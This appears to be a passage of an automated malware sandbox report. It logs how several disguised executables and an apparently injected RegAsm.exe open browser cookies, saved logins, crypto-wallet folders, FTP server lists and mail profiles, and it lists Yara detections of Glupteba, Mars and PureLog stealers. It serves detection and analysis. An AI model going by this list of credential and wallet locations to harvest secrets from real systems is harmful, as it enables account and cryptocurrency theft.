Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Directory queried: C:\Users\user\Documents\SimpleAdobe
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Directory queried: C:\Users\user\Documents

Source: Yara match	File source: 0000000F.00000002.2620868713.0000000001E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2255116493.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: I4B42zAlYY8EYRVPVQPCuOQX.exe PID: 7688, type: MEMORYSTR

Remote Access Functionality

Yara detected Glupteba

Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.2f70e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KUc3lCE6xAEEreIlM0ct4583.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMz4w55AcOQKH9K459dvrUGA.exe PID: 7672, type: MEMORYSTR

Yara detected Mars stealer

Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625ff5620.61.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.cTThtD77H613MBNsXAevJo07.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626082c80.62.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625ce8c40.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c9c780.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c1dde0.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625f327c0.39.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cd9c00.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.fq9BbqPKEgDrDHrc1Aru5zuA.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625f327c0.35.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cff480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.tskTMObYcvz1CtypLgyOWpYi.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cd9c00.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c2f140.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c1dde0.87.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bfd2a0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cfe8b0.104.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625d0d1e0.102.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625be8caf.79.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c69d20.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626049220.43.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626065420.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bfd2a0.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cd9c00.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625ff5620.55.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625d0d1e0.86.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bcda60.92.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c0bda0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625be8caf.109.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626010da0.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bcda60.82.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c50820.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625be8caf.115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c9c780.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c208e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c168a0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bfd2a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.1837512672.00000000005B2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1838966350.0000000000742000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
